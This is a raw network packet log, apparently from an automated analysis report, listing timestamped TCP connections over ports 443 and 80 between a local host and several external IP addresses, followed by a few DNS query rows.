                                        Jan 7, 2025 22:06:26.911037922 CET44349819188.114.96.3192.168.2.4
                                        Jan 7, 2025 22:06:26.911077976 CET49819443192.168.2.4188.114.96.3
                                        Jan 7, 2025 22:06:26.911084890 CET44349819188.114.96.3192.168.2.4
                                        Jan 7, 2025 22:06:26.911106110 CET49819443192.168.2.4188.114.96.3
                                        Jan 7, 2025 22:06:26.911377907 CET44349819188.114.96.3192.168.2.4
                                        Jan 7, 2025 22:06:26.911391020 CET44349819188.114.96.3192.168.2.4
                                        Jan 7, 2025 22:06:26.911724091 CET44349819188.114.96.3192.168.2.4
                                        Jan 7, 2025 22:06:26.911746025 CET44349819188.114.96.3192.168.2.4
                                        Jan 7, 2025 22:06:26.911762953 CET49819443192.168.2.4188.114.96.3
                                        Jan 7, 2025 22:06:26.911771059 CET44349819188.114.96.3192.168.2.4
                                        Jan 7, 2025 22:06:26.911782026 CET49819443192.168.2.4188.114.96.3
                                        Jan 7, 2025 22:06:26.911782980 CET44349819188.114.96.3192.168.2.4
                                        Jan 7, 2025 22:06:26.911822081 CET49819443192.168.2.4188.114.96.3
                                        Jan 7, 2025 22:06:26.911830902 CET44349819188.114.96.3192.168.2.4
                                        Jan 7, 2025 22:06:26.911890984 CET49819443192.168.2.4188.114.96.3
                                        Jan 7, 2025 22:06:26.915009022 CET44349819188.114.96.3192.168.2.4
                                        Jan 7, 2025 22:06:26.915040970 CET44349819188.114.96.3192.168.2.4
                                        Jan 7, 2025 22:06:26.915088892 CET44349819188.114.96.3192.168.2.4
                                        Jan 7, 2025 22:06:26.915098906 CET49819443192.168.2.4188.114.96.3
                                        Jan 7, 2025 22:06:26.915105104 CET44349819188.114.96.3192.168.2.4
                                        Jan 7, 2025 22:06:26.915148020 CET49819443192.168.2.4188.114.96.3
                                        Jan 7, 2025 22:06:26.915186882 CET49819443192.168.2.4188.114.96.3
                                        Jan 7, 2025 22:06:26.915649891 CET44349819188.114.96.3192.168.2.4
                                        Jan 7, 2025 22:06:26.915662050 CET44349819188.114.96.3192.168.2.4
                                        Jan 7, 2025 22:06:26.915704012 CET44349819188.114.96.3192.168.2.4
                                        Jan 7, 2025 22:06:26.915730000 CET49819443192.168.2.4188.114.96.3
                                        Jan 7, 2025 22:06:26.915735006 CET44349819188.114.96.3192.168.2.4
                                        Jan 7, 2025 22:06:26.915746927 CET44349819188.114.96.3192.168.2.4
                                        Jan 7, 2025 22:06:26.915761948 CET49819443192.168.2.4188.114.96.3
                                        Jan 7, 2025 22:06:26.915801048 CET49819443192.168.2.4188.114.96.3
                                        Jan 7, 2025 22:06:26.933001995 CET44349819188.114.96.3192.168.2.4
                                        Jan 7, 2025 22:06:26.933053970 CET44349819188.114.96.3192.168.2.4
                                        Jan 7, 2025 22:06:26.933094025 CET49819443192.168.2.4188.114.96.3
                                        Jan 7, 2025 22:06:26.933104992 CET44349819188.114.96.3192.168.2.4
                                        Jan 7, 2025 22:06:26.933118105 CET49819443192.168.2.4188.114.96.3
                                        Jan 7, 2025 22:06:26.933147907 CET49819443192.168.2.4188.114.96.3
                                        Jan 7, 2025 22:06:26.971632957 CET44349819188.114.96.3192.168.2.4
                                        Jan 7, 2025 22:06:26.971678972 CET44349819188.114.96.3192.168.2.4
                                        Jan 7, 2025 22:06:26.971705914 CET49819443192.168.2.4188.114.96.3
                                        Jan 7, 2025 22:06:26.971719027 CET44349819188.114.96.3192.168.2.4
                                        Jan 7, 2025 22:06:26.971752882 CET49819443192.168.2.4188.114.96.3
                                        Jan 7, 2025 22:06:26.971775055 CET49819443192.168.2.4188.114.96.3
                                        Jan 7, 2025 22:06:26.971782923 CET44349819188.114.96.3192.168.2.4
                                        Jan 7, 2025 22:06:26.971800089 CET44349819188.114.96.3192.168.2.4
                                        Jan 7, 2025 22:06:26.971879005 CET49819443192.168.2.4188.114.96.3
                                        Jan 7, 2025 22:06:26.971884966 CET44349819188.114.96.3192.168.2.4
                                        Jan 7, 2025 22:06:26.971926928 CET49819443192.168.2.4188.114.96.3
                                        Jan 7, 2025 22:06:26.972176075 CET44349819188.114.96.3192.168.2.4
                                        Jan 7, 2025 22:06:26.972193003 CET44349819188.114.96.3192.168.2.4
                                        Jan 7, 2025 22:06:26.972254992 CET49819443192.168.2.4188.114.96.3
                                        Jan 7, 2025 22:06:26.972260952 CET44349819188.114.96.3192.168.2.4
                                        Jan 7, 2025 22:06:26.972306967 CET49819443192.168.2.4188.114.96.3
                                        Jan 7, 2025 22:06:26.972415924 CET44349819188.114.96.3192.168.2.4
                                        Jan 7, 2025 22:06:26.972429991 CET44349819188.114.96.3192.168.2.4
                                        Jan 7, 2025 22:06:26.972491980 CET49819443192.168.2.4188.114.96.3
                                        Jan 7, 2025 22:06:26.972497940 CET44349819188.114.96.3192.168.2.4
                                        Jan 7, 2025 22:06:26.972539902 CET49819443192.168.2.4188.114.96.3
                                        Jan 7, 2025 22:06:26.972563982 CET44349819188.114.96.3192.168.2.4
                                        Jan 7, 2025 22:06:26.972579002 CET44349819188.114.96.3192.168.2.4
                                        Jan 7, 2025 22:06:26.972631931 CET49819443192.168.2.4188.114.96.3
                                        Jan 7, 2025 22:06:26.972637892 CET44349819188.114.96.3192.168.2.4
                                        Jan 7, 2025 22:06:26.972680092 CET49819443192.168.2.4188.114.96.3
                                        Jan 7, 2025 22:06:26.972738981 CET44349819188.114.96.3192.168.2.4
                                        Jan 7, 2025 22:06:26.972753048 CET44349819188.114.96.3192.168.2.4
                                        Jan 7, 2025 22:06:26.972779989 CET44349819188.114.96.3192.168.2.4
                                        Jan 7, 2025 22:06:26.972815990 CET44349819188.114.96.3192.168.2.4
                                        Jan 7, 2025 22:06:26.972817898 CET49819443192.168.2.4188.114.96.3
                                        Jan 7, 2025 22:06:26.972826958 CET44349819188.114.96.3192.168.2.4
                                        Jan 7, 2025 22:06:26.972842932 CET49819443192.168.2.4188.114.96.3
                                        Jan 7, 2025 22:06:26.972872972 CET49819443192.168.2.4188.114.96.3
                                        Jan 7, 2025 22:06:27.001091957 CET44349819188.114.96.3192.168.2.4
                                        Jan 7, 2025 22:06:27.001136065 CET44349819188.114.96.3192.168.2.4
                                        Jan 7, 2025 22:06:27.001169920 CET49819443192.168.2.4188.114.96.3
                                        Jan 7, 2025 22:06:27.001177073 CET44349819188.114.96.3192.168.2.4
                                        Jan 7, 2025 22:06:27.001199007 CET49819443192.168.2.4188.114.96.3
                                        Jan 7, 2025 22:06:27.001219034 CET49819443192.168.2.4188.114.96.3
                                        Jan 7, 2025 22:06:27.021250010 CET44349819188.114.96.3192.168.2.4
                                        Jan 7, 2025 22:06:27.021320105 CET49819443192.168.2.4188.114.96.3
                                        Jan 7, 2025 22:06:27.021393061 CET44349819188.114.96.3192.168.2.4
                                        Jan 7, 2025 22:06:27.021424055 CET44349819188.114.96.3192.168.2.4
                                        Jan 7, 2025 22:06:27.021445036 CET49819443192.168.2.4188.114.96.3
                                        Jan 7, 2025 22:06:27.021450043 CET44349819188.114.96.3192.168.2.4
                                        Jan 7, 2025 22:06:27.021460056 CET44349819188.114.96.3192.168.2.4
                                        Jan 7, 2025 22:06:27.021461010 CET49819443192.168.2.4188.114.96.3
                                        Jan 7, 2025 22:06:27.021516085 CET49819443192.168.2.4188.114.96.3
                                        Jan 7, 2025 22:06:27.021522999 CET44349819188.114.96.3192.168.2.4
                                        Jan 7, 2025 22:06:27.021565914 CET49819443192.168.2.4188.114.96.3
                                        Jan 7, 2025 22:06:27.046868086 CET44349819188.114.96.3192.168.2.4
                                        Jan 7, 2025 22:06:27.046964884 CET49819443192.168.2.4188.114.96.3
                                        Jan 7, 2025 22:06:27.046982050 CET44349819188.114.96.3192.168.2.4
                                        Jan 7, 2025 22:06:27.047225952 CET44349819188.114.96.3192.168.2.4
                                        Jan 7, 2025 22:06:27.047283888 CET49819443192.168.2.4188.114.96.3
                                        Jan 7, 2025 22:06:27.047291994 CET44349819188.114.96.3192.168.2.4
                                        Jan 7, 2025 22:06:27.047477007 CET44349819188.114.96.3192.168.2.4
                                        Jan 7, 2025 22:06:27.047533989 CET49819443192.168.2.4188.114.96.3
                                        Jan 7, 2025 22:06:27.047540903 CET44349819188.114.96.3192.168.2.4
                                        Jan 7, 2025 22:06:27.047560930 CET44349819188.114.96.3192.168.2.4
                                        Jan 7, 2025 22:06:27.047583103 CET49819443192.168.2.4188.114.96.3
                                        Jan 7, 2025 22:06:27.047589064 CET44349819188.114.96.3192.168.2.4
                                        Jan 7, 2025 22:06:27.047601938 CET44349819188.114.96.3192.168.2.4
                                        Jan 7, 2025 22:06:27.047617912 CET49819443192.168.2.4188.114.96.3
                                        Jan 7, 2025 22:06:27.047643900 CET49819443192.168.2.4188.114.96.3
                                        Jan 7, 2025 22:06:27.047650099 CET44349819188.114.96.3192.168.2.4
                                        Jan 7, 2025 22:06:27.047960043 CET44349819188.114.96.3192.168.2.4
                                        Jan 7, 2025 22:06:27.047974110 CET44349819188.114.96.3192.168.2.4
                                        Jan 7, 2025 22:06:27.048048019 CET49819443192.168.2.4188.114.96.3
                                        Jan 7, 2025 22:06:27.048055887 CET44349819188.114.96.3192.168.2.4
                                        Jan 7, 2025 22:06:27.048067093 CET44349819188.114.96.3192.168.2.4
                                        Jan 7, 2025 22:06:27.048079967 CET44349819188.114.96.3192.168.2.4
                                        Jan 7, 2025 22:06:27.048121929 CET49819443192.168.2.4188.114.96.3
                                        Jan 7, 2025 22:06:27.048130035 CET44349819188.114.96.3192.168.2.4
                                        Jan 7, 2025 22:06:27.048152924 CET49819443192.168.2.4188.114.96.3
                                        Jan 7, 2025 22:06:27.059842110 CET44349819188.114.96.3192.168.2.4
                                        Jan 7, 2025 22:06:27.059870005 CET44349819188.114.96.3192.168.2.4
                                        Jan 7, 2025 22:06:27.059915066 CET44349819188.114.96.3192.168.2.4
                                        Jan 7, 2025 22:06:27.059917927 CET49819443192.168.2.4188.114.96.3
                                        Jan 7, 2025 22:06:27.059932947 CET44349819188.114.96.3192.168.2.4
                                        Jan 7, 2025 22:06:27.059951067 CET49819443192.168.2.4188.114.96.3
                                        Jan 7, 2025 22:06:27.059976101 CET49819443192.168.2.4188.114.96.3
                                        Jan 7, 2025 22:06:27.059982061 CET44349819188.114.96.3192.168.2.4
                                        Jan 7, 2025 22:06:27.060003996 CET44349819188.114.96.3192.168.2.4
                                        Jan 7, 2025 22:06:27.060026884 CET49819443192.168.2.4188.114.96.3
                                        Jan 7, 2025 22:06:27.060050011 CET49819443192.168.2.4188.114.96.3
                                        Jan 7, 2025 22:06:27.060154915 CET49819443192.168.2.4188.114.96.3
                                        Jan 7, 2025 22:06:27.060167074 CET44349819188.114.96.3192.168.2.4
                                        Jan 7, 2025 22:06:27.069906950 CET49822443192.168.2.4188.114.96.3
                                        Jan 7, 2025 22:06:27.069933891 CET44349822188.114.96.3192.168.2.4
                                        Jan 7, 2025 22:06:27.070019960 CET49822443192.168.2.4188.114.96.3
                                        Jan 7, 2025 22:06:27.070390940 CET49822443192.168.2.4188.114.96.3
                                        Jan 7, 2025 22:06:27.070405960 CET44349822188.114.96.3192.168.2.4
                                        Jan 7, 2025 22:06:27.071723938 CET49823443192.168.2.4188.114.97.3
                                        Jan 7, 2025 22:06:27.071743965 CET44349823188.114.97.3192.168.2.4
                                        Jan 7, 2025 22:06:27.071803093 CET49823443192.168.2.4188.114.97.3
                                        Jan 7, 2025 22:06:27.072087049 CET49823443192.168.2.4188.114.97.3
                                        Jan 7, 2025 22:06:27.072102070 CET44349823188.114.97.3192.168.2.4
                                        Jan 7, 2025 22:06:27.535113096 CET44349822188.114.96.3192.168.2.4
                                        Jan 7, 2025 22:06:27.535468102 CET49822443192.168.2.4188.114.96.3
                                        Jan 7, 2025 22:06:27.535486937 CET44349822188.114.96.3192.168.2.4
                                        Jan 7, 2025 22:06:27.536472082 CET44349822188.114.96.3192.168.2.4
                                        Jan 7, 2025 22:06:27.536546946 CET49822443192.168.2.4188.114.96.3
                                        Jan 7, 2025 22:06:27.536925077 CET49822443192.168.2.4188.114.96.3
                                        Jan 7, 2025 22:06:27.536940098 CET49822443192.168.2.4188.114.96.3
                                        Jan 7, 2025 22:06:27.536986113 CET44349822188.114.96.3192.168.2.4
                                        Jan 7, 2025 22:06:27.537007093 CET49822443192.168.2.4188.114.96.3
                                        Jan 7, 2025 22:06:27.537041903 CET49822443192.168.2.4188.114.96.3
                                        Jan 7, 2025 22:06:27.537415028 CET49824443192.168.2.4188.114.96.3
                                        Jan 7, 2025 22:06:27.537456989 CET44349824188.114.96.3192.168.2.4
                                        Jan 7, 2025 22:06:27.537519932 CET49824443192.168.2.4188.114.96.3
                                        Jan 7, 2025 22:06:27.537718058 CET49824443192.168.2.4188.114.96.3
                                        Jan 7, 2025 22:06:27.537731886 CET44349824188.114.96.3192.168.2.4
                                        Jan 7, 2025 22:06:27.555026054 CET44349823188.114.97.3192.168.2.4
                                        Jan 7, 2025 22:06:27.555354118 CET49823443192.168.2.4188.114.97.3
                                        Jan 7, 2025 22:06:27.555385113 CET44349823188.114.97.3192.168.2.4
                                        Jan 7, 2025 22:06:27.556037903 CET44349823188.114.97.3192.168.2.4
                                        Jan 7, 2025 22:06:27.557554960 CET49823443192.168.2.4188.114.97.3
                                        Jan 7, 2025 22:06:27.557674885 CET44349823188.114.97.3192.168.2.4
                                        Jan 7, 2025 22:06:27.557725906 CET49823443192.168.2.4188.114.97.3
                                        Jan 7, 2025 22:06:27.599340916 CET44349823188.114.97.3192.168.2.4
                                        Jan 7, 2025 22:06:27.602686882 CET49823443192.168.2.4188.114.97.3
                                        Jan 7, 2025 22:06:27.710848093 CET44349823188.114.97.3192.168.2.4
                                        Jan 7, 2025 22:06:27.711117029 CET44349823188.114.97.3192.168.2.4
                                        Jan 7, 2025 22:06:27.711144924 CET44349823188.114.97.3192.168.2.4
                                        Jan 7, 2025 22:06:27.711172104 CET44349823188.114.97.3192.168.2.4
                                        Jan 7, 2025 22:06:27.711189985 CET49823443192.168.2.4188.114.97.3
                                        Jan 7, 2025 22:06:27.711201906 CET44349823188.114.97.3192.168.2.4
                                        Jan 7, 2025 22:06:27.711231947 CET49823443192.168.2.4188.114.97.3
                                        Jan 7, 2025 22:06:27.711868048 CET44349823188.114.97.3192.168.2.4
                                        Jan 7, 2025 22:06:27.711894035 CET44349823188.114.97.3192.168.2.4
                                        Jan 7, 2025 22:06:27.711918116 CET44349823188.114.97.3192.168.2.4
                                        Jan 7, 2025 22:06:27.711920023 CET49823443192.168.2.4188.114.97.3
                                        Jan 7, 2025 22:06:27.711930037 CET44349823188.114.97.3192.168.2.4
                                        Jan 7, 2025 22:06:27.711961031 CET49823443192.168.2.4188.114.97.3
                                        Jan 7, 2025 22:06:27.712018013 CET44349823188.114.97.3192.168.2.4
                                        Jan 7, 2025 22:06:27.712059975 CET49823443192.168.2.4188.114.97.3
                                        Jan 7, 2025 22:06:27.712567091 CET49823443192.168.2.4188.114.97.3
                                        Jan 7, 2025 22:06:27.712583065 CET44349823188.114.97.3192.168.2.4
                                        Jan 7, 2025 22:06:28.069497108 CET44349824188.114.96.3192.168.2.4
                                        Jan 7, 2025 22:06:28.070473909 CET49824443192.168.2.4188.114.96.3
                                        Jan 7, 2025 22:06:28.070496082 CET44349824188.114.96.3192.168.2.4
                                        Jan 7, 2025 22:06:28.070818901 CET44349824188.114.96.3192.168.2.4
                                        Jan 7, 2025 22:06:28.077511072 CET49824443192.168.2.4188.114.96.3
                                        Jan 7, 2025 22:06:28.077574015 CET44349824188.114.96.3192.168.2.4
                                        Jan 7, 2025 22:06:28.077706099 CET49824443192.168.2.4188.114.96.3
                                        Jan 7, 2025 22:06:28.077730894 CET44349824188.114.96.3192.168.2.4
                                        Jan 7, 2025 22:06:28.552480936 CET44349824188.114.96.3192.168.2.4
                                        Jan 7, 2025 22:06:28.552565098 CET44349824188.114.96.3192.168.2.4
                                        Jan 7, 2025 22:06:28.552607059 CET49824443192.168.2.4188.114.96.3
                                        Jan 7, 2025 22:06:28.552609921 CET44349824188.114.96.3192.168.2.4
                                        Jan 7, 2025 22:06:28.552628994 CET44349824188.114.96.3192.168.2.4
                                        Jan 7, 2025 22:06:28.552669048 CET49824443192.168.2.4188.114.96.3
                                        Jan 7, 2025 22:06:28.552675962 CET44349824188.114.96.3192.168.2.4
                                        Jan 7, 2025 22:06:28.552968025 CET44349824188.114.96.3192.168.2.4
                                        Jan 7, 2025 22:06:28.553013086 CET49824443192.168.2.4188.114.96.3
                                        Jan 7, 2025 22:06:28.553016901 CET44349824188.114.96.3192.168.2.4
                                        Jan 7, 2025 22:06:28.553028107 CET44349824188.114.96.3192.168.2.4
                                        Jan 7, 2025 22:06:28.553057909 CET49824443192.168.2.4188.114.96.3
                                        Jan 7, 2025 22:06:28.553064108 CET44349824188.114.96.3192.168.2.4
                                        Jan 7, 2025 22:06:28.553867102 CET44349824188.114.96.3192.168.2.4
                                        Jan 7, 2025 22:06:28.553906918 CET49824443192.168.2.4188.114.96.3
                                        Jan 7, 2025 22:06:28.553911924 CET44349824188.114.96.3192.168.2.4
                                        Jan 7, 2025 22:06:28.557084084 CET44349824188.114.96.3192.168.2.4
                                        Jan 7, 2025 22:06:28.557133913 CET49824443192.168.2.4188.114.96.3
                                        Jan 7, 2025 22:06:28.557140112 CET44349824188.114.96.3192.168.2.4
                                        Jan 7, 2025 22:06:28.557215929 CET44349824188.114.96.3192.168.2.4
                                        Jan 7, 2025 22:06:28.557257891 CET49824443192.168.2.4188.114.96.3
                                        Jan 7, 2025 22:06:28.557671070 CET49824443192.168.2.4188.114.96.3
                                        Jan 7, 2025 22:06:28.557687044 CET44349824188.114.96.3192.168.2.4
                                        Jan 7, 2025 22:06:28.565762997 CET49825443192.168.2.4188.114.97.3
                                        Jan 7, 2025 22:06:28.565814018 CET44349825188.114.97.3192.168.2.4
                                        Jan 7, 2025 22:06:28.565886021 CET49825443192.168.2.4188.114.97.3
                                        Jan 7, 2025 22:06:28.566303968 CET49825443192.168.2.4188.114.97.3
                                        Jan 7, 2025 22:06:28.566317081 CET44349825188.114.97.3192.168.2.4
                                        Jan 7, 2025 22:06:29.047940016 CET44349825188.114.97.3192.168.2.4
                                        Jan 7, 2025 22:06:29.048281908 CET49825443192.168.2.4188.114.97.3
                                        Jan 7, 2025 22:06:29.048300028 CET44349825188.114.97.3192.168.2.4
                                        Jan 7, 2025 22:06:29.048621893 CET44349825188.114.97.3192.168.2.4
                                        Jan 7, 2025 22:06:29.048947096 CET49825443192.168.2.4188.114.97.3
                                        Jan 7, 2025 22:06:29.049006939 CET44349825188.114.97.3192.168.2.4
                                        Jan 7, 2025 22:06:29.049110889 CET49825443192.168.2.4188.114.97.3
                                        Jan 7, 2025 22:06:29.095334053 CET44349825188.114.97.3192.168.2.4
                                        Jan 7, 2025 22:06:29.191112041 CET44349825188.114.97.3192.168.2.4
                                        Jan 7, 2025 22:06:29.191220999 CET44349825188.114.97.3192.168.2.4
                                        Jan 7, 2025 22:06:29.191268921 CET49825443192.168.2.4188.114.97.3
                                        Jan 7, 2025 22:06:29.191272020 CET44349825188.114.97.3192.168.2.4
                                        Jan 7, 2025 22:06:29.191289902 CET44349825188.114.97.3192.168.2.4
                                        Jan 7, 2025 22:06:29.191332102 CET49825443192.168.2.4188.114.97.3
                                        Jan 7, 2025 22:06:29.191337109 CET44349825188.114.97.3192.168.2.4
                                        Jan 7, 2025 22:06:29.191378117 CET44349825188.114.97.3192.168.2.4
                                        Jan 7, 2025 22:06:29.191422939 CET49825443192.168.2.4188.114.97.3
                                        Jan 7, 2025 22:06:29.191427946 CET44349825188.114.97.3192.168.2.4
                                        Jan 7, 2025 22:06:29.191875935 CET44349825188.114.97.3192.168.2.4
                                        Jan 7, 2025 22:06:29.191920042 CET49825443192.168.2.4188.114.97.3
                                        Jan 7, 2025 22:06:29.191924095 CET44349825188.114.97.3192.168.2.4
                                        Jan 7, 2025 22:06:29.191955090 CET44349825188.114.97.3192.168.2.4
                                        Jan 7, 2025 22:06:29.192007065 CET49825443192.168.2.4188.114.97.3
                                        Jan 7, 2025 22:06:29.192404985 CET49825443192.168.2.4188.114.97.3
                                        Jan 7, 2025 22:06:29.192419052 CET44349825188.114.97.3192.168.2.4
                                        Jan 7, 2025 22:06:37.526911974 CET49739443192.168.2.454.225.69.136
                                        Jan 7, 2025 22:06:37.526943922 CET4434973954.225.69.136192.168.2.4
                                        Jan 7, 2025 22:06:49.854518890 CET49888443192.168.2.4142.250.184.228
                                        Jan 7, 2025 22:06:49.854536057 CET44349888142.250.184.228192.168.2.4
                                        Jan 7, 2025 22:06:49.854615927 CET49888443192.168.2.4142.250.184.228
                                        Jan 7, 2025 22:06:49.854909897 CET49888443192.168.2.4142.250.184.228
                                        Jan 7, 2025 22:06:49.854923010 CET44349888142.250.184.228192.168.2.4
                                        Jan 7, 2025 22:06:50.522202969 CET44349888142.250.184.228192.168.2.4
                                        Jan 7, 2025 22:06:50.522552967 CET49888443192.168.2.4142.250.184.228
                                        Jan 7, 2025 22:06:50.522581100 CET44349888142.250.184.228192.168.2.4
                                        Jan 7, 2025 22:06:50.522895098 CET44349888142.250.184.228192.168.2.4
                                        Jan 7, 2025 22:06:50.523205042 CET49888443192.168.2.4142.250.184.228
                                        Jan 7, 2025 22:06:50.523262024 CET44349888142.250.184.228192.168.2.4
                                        Jan 7, 2025 22:06:50.572837114 CET49888443192.168.2.4142.250.184.228
                                        Jan 7, 2025 22:06:50.909315109 CET4972480192.168.2.4199.232.214.172
                                        Jan 7, 2025 22:06:50.919568062 CET8049724199.232.214.172192.168.2.4
                                        Jan 7, 2025 22:06:50.919692039 CET4972480192.168.2.4199.232.214.172
                                        Jan 7, 2025 22:06:54.308032990 CET49739443192.168.2.454.225.69.136
                                        Jan 7, 2025 22:06:54.308128119 CET4434973954.225.69.136192.168.2.4
                                        Jan 7, 2025 22:06:54.308206081 CET49739443192.168.2.454.225.69.136
                                        Jan 7, 2025 22:06:54.481122971 CET49915443192.168.2.435.190.80.1
                                        Jan 7, 2025 22:06:54.481178045 CET4434991535.190.80.1192.168.2.4
                                        Jan 7, 2025 22:06:54.481245041 CET49915443192.168.2.435.190.80.1
                                        Jan 7, 2025 22:06:54.481625080 CET49915443192.168.2.435.190.80.1
                                        Jan 7, 2025 22:06:54.481647968 CET4434991535.190.80.1192.168.2.4
                                        Jan 7, 2025 22:06:54.488141060 CET49917443192.168.2.435.190.80.1
                                        Jan 7, 2025 22:06:54.488181114 CET4434991735.190.80.1192.168.2.4
                                        Jan 7, 2025 22:06:54.488239050 CET49917443192.168.2.435.190.80.1
                                        Jan 7, 2025 22:06:54.488455057 CET49917443192.168.2.435.190.80.1
                                        Jan 7, 2025 22:06:54.488468885 CET4434991735.190.80.1192.168.2.4
                                        Jan 7, 2025 22:06:54.951996088 CET4434991535.190.80.1192.168.2.4
                                        Jan 7, 2025 22:06:54.952363968 CET49915443192.168.2.435.190.80.1
                                        Jan 7, 2025 22:06:54.952383995 CET4434991535.190.80.1192.168.2.4
                                        Jan 7, 2025 22:06:54.952739000 CET4434991535.190.80.1192.168.2.4
                                        Jan 7, 2025 22:06:54.953061104 CET49915443192.168.2.435.190.80.1
                                        Jan 7, 2025 22:06:54.953125954 CET4434991535.190.80.1192.168.2.4
                                        Jan 7, 2025 22:06:54.953203917 CET49915443192.168.2.435.190.80.1
                                        Jan 7, 2025 22:06:54.976929903 CET4434991735.190.80.1192.168.2.4
                                        Jan 7, 2025 22:06:54.977159023 CET49917443192.168.2.435.190.80.1
                                        Jan 7, 2025 22:06:54.977174997 CET4434991735.190.80.1192.168.2.4
                                        Jan 7, 2025 22:06:54.978259087 CET4434991735.190.80.1192.168.2.4
                                        Jan 7, 2025 22:06:54.978322983 CET49917443192.168.2.435.190.80.1
                                        Jan 7, 2025 22:06:54.978677988 CET49917443192.168.2.435.190.80.1
                                        Jan 7, 2025 22:06:54.978738070 CET4434991735.190.80.1192.168.2.4
                                        Jan 7, 2025 22:06:54.978780985 CET49917443192.168.2.435.190.80.1
                                        Jan 7, 2025 22:06:54.995338917 CET4434991535.190.80.1192.168.2.4
                                        Jan 7, 2025 22:06:55.023329973 CET4434991735.190.80.1192.168.2.4
                                        Jan 7, 2025 22:06:55.025084019 CET49917443192.168.2.435.190.80.1
                                        Jan 7, 2025 22:06:55.025093079 CET4434991735.190.80.1192.168.2.4
                                        Jan 7, 2025 22:06:55.072006941 CET49917443192.168.2.435.190.80.1
                                        Jan 7, 2025 22:06:55.091126919 CET4434991535.190.80.1192.168.2.4
                                        Jan 7, 2025 22:06:55.091281891 CET4434991535.190.80.1192.168.2.4
                                        Jan 7, 2025 22:06:55.091346979 CET49915443192.168.2.435.190.80.1
                                        Jan 7, 2025 22:06:55.091460943 CET49915443192.168.2.435.190.80.1
                                        Jan 7, 2025 22:06:55.091476917 CET4434991535.190.80.1192.168.2.4
                                        Jan 7, 2025 22:06:55.091486931 CET49915443192.168.2.435.190.80.1
                                        Jan 7, 2025 22:06:55.091547966 CET49915443192.168.2.435.190.80.1
                                        Jan 7, 2025 22:06:55.092165947 CET49922443192.168.2.435.190.80.1
                                        Jan 7, 2025 22:06:55.092204094 CET4434992235.190.80.1192.168.2.4
                                        Jan 7, 2025 22:06:55.092271090 CET49922443192.168.2.435.190.80.1
                                        Jan 7, 2025 22:06:55.092479944 CET49922443192.168.2.435.190.80.1
                                        Jan 7, 2025 22:06:55.092493057 CET4434992235.190.80.1192.168.2.4
                                        Jan 7, 2025 22:06:55.111459017 CET4434991735.190.80.1192.168.2.4
                                        Jan 7, 2025 22:06:55.111557961 CET4434991735.190.80.1192.168.2.4
                                        Jan 7, 2025 22:06:55.111633062 CET49917443192.168.2.435.190.80.1
                                        Jan 7, 2025 22:06:55.111633062 CET49917443192.168.2.435.190.80.1
                                        Jan 7, 2025 22:06:55.111990929 CET49917443192.168.2.435.190.80.1
                                        Jan 7, 2025 22:06:55.111998081 CET49923443192.168.2.435.190.80.1
                                        Jan 7, 2025 22:06:55.112037897 CET4434992335.190.80.1192.168.2.4
                                        Jan 7, 2025 22:06:55.112119913 CET49923443192.168.2.435.190.80.1
                                        Jan 7, 2025 22:06:55.112334967 CET49923443192.168.2.435.190.80.1
                                        Jan 7, 2025 22:06:55.112349987 CET4434992335.190.80.1192.168.2.4
                                        Jan 7, 2025 22:06:55.564826965 CET4434992235.190.80.1192.168.2.4
                                        Jan 7, 2025 22:06:55.565115929 CET49922443192.168.2.435.190.80.1
                                        Jan 7, 2025 22:06:55.565124989 CET4434992235.190.80.1192.168.2.4
                                        Jan 7, 2025 22:06:55.565449953 CET4434992235.190.80.1192.168.2.4
                                        Jan 7, 2025 22:06:55.565773964 CET49922443192.168.2.435.190.80.1
                                        Jan 7, 2025 22:06:55.565834999 CET4434992235.190.80.1192.168.2.4
                                        Jan 7, 2025 22:06:55.565923929 CET49922443192.168.2.435.190.80.1
                                        Jan 7, 2025 22:06:55.565958977 CET49922443192.168.2.435.190.80.1
                                        Jan 7, 2025 22:06:55.565989971 CET4434992235.190.80.1192.168.2.4
                                        Jan 7, 2025 22:06:55.566910982 CET4434992335.190.80.1192.168.2.4
                                        Jan 7, 2025 22:06:55.567075968 CET49923443192.168.2.435.190.80.1
                                        Jan 7, 2025 22:06:55.567106009 CET4434992335.190.80.1192.168.2.4
                                        Jan 7, 2025 22:06:55.567497969 CET4434992335.190.80.1192.168.2.4
                                        Jan 7, 2025 22:06:55.567800045 CET49923443192.168.2.435.190.80.1
                                        Jan 7, 2025 22:06:55.567862034 CET4434992335.190.80.1192.168.2.4
                                        Jan 7, 2025 22:06:55.567863941 CET49923443192.168.2.435.190.80.1
                                        Jan 7, 2025 22:06:55.567902088 CET49923443192.168.2.435.190.80.1
                                        Jan 7, 2025 22:06:55.567934036 CET4434992335.190.80.1192.168.2.4
                                        Jan 7, 2025 22:06:55.618850946 CET49923443192.168.2.435.190.80.1
                                        Jan 7, 2025 22:06:55.691073895 CET4434992335.190.80.1192.168.2.4
                                        Jan 7, 2025 22:06:55.691153049 CET4434992335.190.80.1192.168.2.4
                                        Jan 7, 2025 22:06:55.691199064 CET49923443192.168.2.435.190.80.1
                                        Jan 7, 2025 22:06:55.691469908 CET49923443192.168.2.435.190.80.1
                                        Jan 7, 2025 22:06:55.691489935 CET4434992335.190.80.1192.168.2.4
                                        Jan 7, 2025 22:06:55.696691990 CET4434992235.190.80.1192.168.2.4
                                        Jan 7, 2025 22:06:55.696753979 CET4434992235.190.80.1192.168.2.4
                                        Jan 7, 2025 22:06:55.696803093 CET49922443192.168.2.435.190.80.1
                                        Jan 7, 2025 22:06:55.696897984 CET49922443192.168.2.435.190.80.1
                                        Jan 7, 2025 22:06:55.696913958 CET4434992235.190.80.1192.168.2.4
                                        Jan 7, 2025 22:06:55.696924925 CET49922443192.168.2.435.190.80.1
                                        Jan 7, 2025 22:06:55.696969032 CET49922443192.168.2.435.190.80.1
                                        Jan 7, 2025 22:07:00.436620951 CET44349888142.250.184.228192.168.2.4
                                        Jan 7, 2025 22:07:00.436688900 CET44349888142.250.184.228192.168.2.4
                                        Jan 7, 2025 22:07:00.436866045 CET49888443192.168.2.4142.250.184.228
                                        Jan 7, 2025 22:07:02.324600935 CET49888443192.168.2.4142.250.184.228
                                        Jan 7, 2025 22:07:02.324629068 CET44349888142.250.184.228192.168.2.4
                                        TimestampSource PortDest PortSource IPDest IP
                                        Jan 7, 2025 22:05:45.883831024 CET53521021.1.1.1192.168.2.4
                                        Jan 7, 2025 22:05:45.886225939 CET53494571.1.1.1192.168.2.4
                                        Jan 7, 2025 22:05:47.036804914 CET53526871.1.1.1192.168.2.4
                                        Jan 7, 2025 22:05:49.791850090 CET5498653192.168.2.41.1.1.1
